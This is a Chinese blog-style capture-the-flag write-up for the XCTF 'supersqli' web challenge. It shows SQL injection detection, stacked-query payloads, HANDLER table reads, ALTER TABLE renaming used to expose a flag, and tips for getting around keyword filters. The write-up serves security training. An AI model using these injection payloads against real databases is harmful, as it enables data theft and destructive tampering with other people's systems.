前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >【愚公系列】2022年01月 攻防世界-进阶题-WEB-012(supersqli)

【愚公系列】2022年01月 攻防世界-进阶题-WEB-012(supersqli)

作者头像
愚公搬代码
发布2022-01-25 11:06:46
发布2022-01-25 11:06:46
45900
代码可运行
举报
文章被收录于专栏:历史专栏历史专栏
运行总次数:0
代码可运行

文章目录


一、supersqli

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

2.进入场景

输入1’发现不回显,然后1’ #显示正常,判断是存在sql注入了

order by 2的时候是正常回显了,order by 3就出错了,只有2个字段,这时候用1' union select 1,2,#进行联合查询,发现关键字被正则过滤

尝试堆叠注入-1';show tables #

查询两张表名字段

代码语言:javascript
代码运行次数:0
复制
-1';show columns from `1919810931114514` #

-1';show columns from `words` #

3.构造注入语句

第一种方式:

代码语言:javascript
代码运行次数:0
复制
-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

第二种方式:

代码语言:javascript
代码运行次数:0
复制
//修改表
1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
//在查询
1' or 1=1#

总结

知识点总结

  1. MySQL表名为纯数字时(表名和保留字冲突时也是加反引号),要加反引号:show columns from 1919810931114514
  2. MySQL 官方将 prepare、execute、deallocate 统称为 PREPARE STATEMENT,也就是预处理语句
  3. 字符拼接函数可以考虑用来绕过关键字检查
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022/01/24 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章目录
  • 一、supersqli
  • 二、使用步骤
    • 1.点击获取在线场景
    • 2.进入场景
    • 3.构造注入语句
  • 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档